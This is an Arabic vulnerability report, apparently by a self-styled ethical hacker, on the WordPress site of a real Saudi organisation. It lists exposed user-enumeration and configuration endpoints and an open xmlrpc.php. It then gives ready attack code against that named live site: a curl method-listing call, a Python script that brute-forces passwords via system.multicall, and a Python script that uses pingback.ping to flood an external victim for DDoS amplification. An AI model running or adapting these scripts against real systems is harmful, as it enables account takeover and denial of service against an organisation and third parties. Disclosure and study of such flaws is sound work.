تم اكتشاف عدة مسارات واجهات برمجة تطبيقات (APIs) ومجلدات حساسة مكشوفة في الموقع، تسمح بتسريب معلومات حساسة دون الحاجة إلى مصادقة، مما يمثل خطورة أمنية عالية.
https://fsc.org.sa/wp-json/wp/v2/users
https://fsc.org.sa/wp-json/wp/v2/users/[1-25]
تسريب قائمة المستخدمين المسجلين في النظام
نتيجة استدعاء واجهة المستخدمين بدون مصادقة - لاحظ تسريب البيانات الحساسة
https://fsc.org.sa/wp-json/jetpack/v4/connection
https://fsc.org.sa/wp-content/plugins/jetpack/
https://fsc.org.sa/wp-content/languages/plugins/
كشف معلومات تكوين وإعدادات Jetpack
إمكانية استغلال نقاط النهاية لتنفيذ عمليات خبيثة
https://fsc.org.sa/info.php
https://fsc.org.sa/readme.html
https://fsc.org.sa/wp-admin/install.php
كشف معلومات مفصلة عن بيئة الخادم
تسريب إصدار ووردبريس المستخدم
https://fsc.org.sa/wp-content/languages/
https://fsc.org.sa/wp-content/themes/twentytwentyfour/
كشف ملفات الترجمة الحساسة
الوصول إلى ملفات النظام الداخلية
جميع المسارات المذكورة تسمح للمهاجم بجمع معلومات حساسة عن النظام والبنية التحتية، مما يمهد لهجمات أكثر تطوراً.
كشف إصدارات المكونات المختلفة يسمح للمهاجم باستغلال الثغرات الأمنية المعروفة في هذه الإصدارات.
ملف xmlrpc.php شغال على نطاق الموقع الرسمي لاتحاد الغرف التجارية السعودية، ويقبل طلبات
system.multicall
pingback.ping system.listMethods
بدون تحقق كافٍ.
هذا يسمح للمهاجمين بتنفيذ:
https://fsc.org.sa/xmlrpc.php
كشف جميع الدوال المتاحة على الخادم، بما في ذلك دوال WordPress الحساسة مثل إدارة المقالات، الصفحات، التعليقات، الوسائط، والمستخدمين.
يمكن استغلالها لتنفيذ محاولات تسجيل دخول متعددة في طلب واحد، مما يزيد سرعة وكفاءة هجمات Brute Force.
يمكن استغلالها لإرسال طلبات HTTP إلى أهداف خارجية، مما يحول الخادم إلى أداة في هجمات DDoS Amplification.
curl -X POST https://fsc.org.sa/xmlrpc.php -d 'system.listMethods ' -H "Content-Type: text/xml"
import xmlrpc.client
url = "https://fsc.org.sa/xmlrpc.php"
username = "example-user"
passwords = ["pass1", "pass2", "pass3", "pass4"]
client = xmlrpc.client.ServerProxy(url)
multicall_data = [{
'methodName': 'wp.getUsersBlogs',
'params': [username, pw]
} for pw in passwords]
try:
response = client.system.multicall(multicall_data)
for i, result in enumerate(response):
if isinstance(result, dict) and 'faultCode' in result:
print(f"كلمة المرور {passwords[i]} فشلت")
else:
print(f"كلمة المرور {passwords[i]} نجحت!")
break
except Exception as e:
print(f"حدث خطأ: {str(e)}")
import requests
import time
target_url = "http://example-victim.com" # استبدال بالهدف المطلوب
xmlrpc_url = "https://fsc.org.sa/xmlrpc.php"
payload = f'''
pingback.ping
https://fsc.org.sa
{target_url}
'''
headers = {'Content-Type': 'text/xml'}
# إرسال الطلبات بشكل متكرر
for i in range(1, 6): # 5 محاولات كتجربة
try:
response = requests.post(xmlrpc_url, data=payload, headers=headers, timeout=10)
print(f"المحاولة {i}: حالة الاستجابة {response.status_code}")
time.sleep(0.5) # تأخير قصير بين الطلبات
except Exception as e:
print(f"فشل في المحاولة {i}: {str(e)}")
هذأ التقرير يهدف الي تحسين أمان المؤسسات السعودية، ولم أقوم بإستغلال الثغرات لأي أغراض ضارة. جميع المعلومات التي قدمتها لكم ستظل سرية و لن أقوم بمشاركتها مع أي أطراف أخرى.
تم إعداد هذا التقرير بواسطة صائد الثغرات الأخلاقي
© 2025 - جميع الحقوق محفوظة | الإصدار 1.0